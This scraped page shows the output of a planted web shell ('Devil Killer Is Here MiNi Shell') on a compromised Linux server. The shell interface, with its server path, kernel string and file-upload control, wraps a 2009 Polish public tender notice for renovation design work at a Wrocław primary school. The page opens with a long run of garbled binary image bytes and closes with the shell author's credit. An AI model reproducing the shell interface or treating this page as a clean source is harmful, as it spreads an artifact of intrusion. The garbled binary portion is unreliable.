JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090424/120490-N-2009.html

<p class="kh_header"><b>Wrocław: Opracowanie dokumentacji projektowej na remont i docieplenie elewacji Szkoły Podstawowej Nr 18 we Wrocławiu przy ul. Poznańskiej 26, przebudowę wejścia  głównego i bocznego, przebudowę sanitariatów oraz adaptację pomieszczeń po mieszkaniach służbowych na świetlicę.</b><br>
<b>Numer ogłoszenia: 120490 - 2009; data zamieszczenia: 24.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Jednostek Miejskich , ul. G. Zapolskiej 2/4, 50-032 Wrocław, woj. dolnośląskie, tel. 071 7777865, faks 071 7777724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroclaw.pl/zojm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na remont i docieplenie elewacji Szkoły Podstawowej Nr 18 we Wrocławiu przy ul. Poznańskiej 26, przebudowę wejścia  głównego i bocznego, przebudowę sanitariatów oraz adaptację pomieszczeń po mieszkaniach służbowych na świetlicę..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie dokumentacji  projektowej na  remont z dociepleniem elewacji, przebudowę wejścia  głównego i  bocznego, przebudowę sanitariatów, adaptację pomieszczeń po mieszkaniach służbowych  na świetlicę wraz z przebudową placu przed wejściem do Szkoły Podstawowej Nr 18 przy ul. Poznańskiej 26, we Wrocławiu. 
2.Charakterystyka obiektu.
Budynek szkoły znajduje się przy ulicy Poznańskiej , na narożniku dwóch ulic - Poznańskiej i Zachodniej z tej lokalizacji wynika iż szkoła znajduje się na działce tylko częściowo ogrodzonej.
Szkoła znajduje się w budynku,  którego założenie projektowe opiera się na rzucie kwadratu z wewnętrznym patiem w środku o mieszanym układzie konstrukcyjnym , czterokondygnacyjny z płaskim stropodachem. Dach płaski kryty papą. Budynek wykonano w technologii wielkopłytowej ze stropami żelbetowymi,  budynek podpiwniczony. Do szkoły przynależy blok sportowy z basenem oraz mieszkaniami służbowymi. Blok sportowy został wyremontowany.
3.Parametry budynku szkoły :
1)kubatura 		-     	ok. 	8.300 	m3
2)powierzchnia zabudowy	-     	ok. 	   532 	m2                  
3)powierzchni sanitariatów 	-	ok.	   150 	m2
4)powierzchnia patia   	-	ok.	   144 	m2              
5)powierzchnia elewacji 	-	ok.	2.400 	m2
6)powierzchni działki   	-	          10.230 	m2
7)powierzchnia mieszkań służbowych 	ok.           100      m2
4.Zakres opracowania dokumentacji:
Dokumentacja projektowa powinna obejmować:
1)Roboty zewnętrzne na budynku:
a)wyburzenia, demontaże i rozbiórki,
b)naprawę i uzupełnienia izolacji  ścian  fundamentowych, odtworzenie  opaski i chodników wokół budynku, przesadzenie jałowców  z betonowych donic znajdujących się tuż przy elewacji  na przebudowywany plac przed wejściem głównym,
c)kompleksowy remont  z przebudową  placu  przed wejściem głównym do szkoły z likwidacją gazonów i przesadzeniem  krzewów  na zagospodarowany plac,
d)kompleksowy remont z przebudową  patia  wraz z remontem instalacji kanalizacji deszczowej, przesadzenie choinek  i innych krzaków rosnących w donicach,          
e)remont z przebudową wejścia głównego z likwidacja zbędnego zadaszenia , z przebudową  schodów i podjazdem dla osób niepełnosprawnych,
f)remont i przebudowa wejścia bocznego (do zaplecza kuchennego) wraz  z zadaszeniem i schodami,
g)naprawę elementów konstrukcji  elewacji,  remont elewacji z dociepleniem( z doborem właściwej grubości docieplenia po przeprowadzeniu obliczeń)  - tynkowanie , malowanie, 
h)zabezpieczenie spękań pojawiających się na ścianach zewnętrznych budynku oraz przeciwdziałanie pojawienia się ponownego na podstawie wykonanej ekspertyzy,
i)demontaż krat na oknach piwnicznych i montaż nowych.
2)Roboty we wnętrzu budynku:
a)kompleksowa przebudowa sanitariatów dla dzieci  zgodnie z obowiązującymi przepisami  z wymianą  stolarki okiennej,  wymianą parapetów zewnętrznych, remontem wewnętrznych jeżeli zajdzie taka potrzeba, oraz sanitariatów  personelu,     
b)wydzielenie z sanitariatów szkolnych sanitariatu   z  dostosowaniem na potrzeby osób  niepełnosprawnych - parter 
c)kompleksowa przebudowa w celu adaptacji dwóch  mieszkań służbowych na potrzeby świetlicy szkolnej wraz z remontem klatki schodowej ( tylko w zakresie opracowania)oraz przebicie przejść na dwóch kondygnacjach dla komunikacji wewnętrznej z budynkiem szkoły  wymiana instalacji co, wod-kan. ,elektrycznych, malowanie , glazura, wymiana podłóg i  posadzek, wymiana stolarki drzwiowej, z  dostosowaniem wymiarów i  kierunku otwierania do obowiązujących przepisów,
d)wywózka gruzu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.22.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 182.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest do wniesienia wadium w wysokości 2.000,00 złotych (słownie: dwa tysiące złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w przepisie art.22 ust.1  Pzp:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy ponadto: 
1)dysponują lub będą dysponować osobami zdolnymi do realizacji zamówienia,  tzn.: osobami posiadającymi uprawnienia projektowe w zakresie zgodnym z przedmiotem zamówienia w branży architektonicznej, konstrukcyjnej, instalacji elektrycznych oraz będących członkami odpowiedniej izby samorządowej, 
2)wymagane jest, by w/w osoba była członkiem właściwej izby samorządu zawodowego,
3)posiadają niezbędną wiedzą i doświadczenie, tzn.: w okresie ostatnich trzech lat zrealizowali minimum dwa  zamówienia polegające na opracowaniu projektu budowlano-wykonawczego wielobranżowego dotyczącego budowy, przebudowy lub remontu  budynku w zakresie którego ujęta  była elewacja o powierzchni przynajmniej 2500 m2 oraz pomieszczenie o kubaturze przynajmniej 1000m2. Wykazane opracowania  muszą być poparte dokumentami wystawionymi przez Inwestora potwierdzającymi, że zostały wykonane  należycie. Wykonawca przedstawi opis określający rodzaj, nazwę i adres inwestycji, poda wartości opracowań oraz daty wykonania,
4)wniosą wadium w wysokości i na zasadach opisanych w rozdziale VIII SIWZ,
5)w przypadku wspólnego ubiegania się o udzielnie zamówienia (art. 23 Pzp), wykonawcy:
a)ustanowią pełnomocnika,
b)każdy z wykonawców oddzielnie musi spełniać wymóg zawarty w ust. 1 pkt. 4 i udokumentować, że nie podlega wykluczeniu na podstawie art. 24 Pzp,
c)wymogi zawarte w ust.1 pkt. 1-3 oraz w ust. 2 wykonawcy mogą spełniać łącznie.
3.Wykluczeniu z postępowania podlegają wykonawcy w przypadkach określonych w art. 24  Pzp.
4.Ocena spełniania powyższych warunków dokonywana będzie w oparciu o złożoną ofertę i załączniki do niej wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie wykonawcy w sprawie ubiegania się o zamówienie publiczne (wzór nr 2.2). Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert *)  
Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia. (wzór nr  2.4) *)
Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia, jeśli w wykazie o którym mowa w ust. 4 wykonawca wskazał osoby, którymi będzie dysponował. *). Aktualne  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio,  że wykonawca nie zalega z opłacaniem podatków, opat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. *). Kopie uprawnień osób wymienionych w wykazie o którym mowa w ust. 4. *). Aktualne zaświadczenia z Izby Inżynierów Budownictwa o przynależności do Izby osób pełniących samodzielne funkcje w budownictwie. ( j.w.). Wykaz zamówień zrealizowanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - (wzór  nr  2.5) wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. *). Wykaz dokumentów które wykonawca załączył do oferty potwierdzających, że zamówienia  wymienione w załączniku - wzór nr 2.5 zostały wykonane z należytą starannością, - (wzór  nr  2.6).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.pl/zojm.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi Jednostek Miejskich
ul. Gabrieli Zapolskiej 2/4, 50-032 Wrocław
pok. 326.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2009 godzina 09:30, miejsce: Zarząd Obsługi Jednostek Miejskich
ul. Gabrieli Zapolskiej 2/4, 50-032 Wrocław
pok. 303.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com